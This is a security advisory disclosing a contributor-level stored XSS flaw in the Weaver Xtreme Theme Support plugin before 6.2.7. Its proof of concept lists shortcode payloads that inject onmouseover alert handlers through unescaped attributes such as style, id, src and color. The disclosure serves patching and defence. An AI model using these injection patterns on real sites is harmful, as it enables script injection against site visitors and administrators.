Weaver Xtreme Theme Support < 6.2.7 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

PoC

Required theme: https://wordpress.org/themes/weaver-xtreme [box background=‘red" onmouseover=“alert(/XSS-background/)”’] Other affected attributes (found when verifying the issue): border_rule, border_radius, color, margin, padding, style Other affected shortcodes identified when verifying the issue: [bloginfo style=‘"onmouseover=alert(/XSS-style/)//’] [div id=‘"onmouseover=alert(/XSS-id/)//’] Other affected attributes: class, style [span id=‘"onmouseover=alert(/XSS-id/)//’] Other affected attributes: class, style [header_image style=‘"onmouseover=alert(/XSS-style/)//’] Other affected attributes: h, w [html args=‘onmouseover=alert(/XSS-args/) style=display:block;width:100px;height:100px;background:red’] [iframe src=‘"onmouseover=alert(/XSS-src/)//’] [iframe src=‘1’ height=‘"onmouseover=alert(/XSS-height/)//’] Other affected attributes: percent, style [site_tagline style=‘"onmouseover=alert(/XSS-style/)//’] [site_title style=‘"onmouseover=alert(/XSS-style/)//’] [vimeo id=‘"onmouseover=alert(/XSS-id/)//’] [vimeo id=‘1’ color=‘"onmouseover=alert(/XSS-color/)//’] Other affected attributes: percent [youtube id=‘"onmouseover=alert(/XSS-id/)//’] [youtube id=‘1’ autohide=‘"onmouseover=alert(/XSS-autohide/)//’] Other affected attributes: color, color1, color2, end, fs, iv_load_policy, origin, percent, playlist, rel, showinfo, start, wmode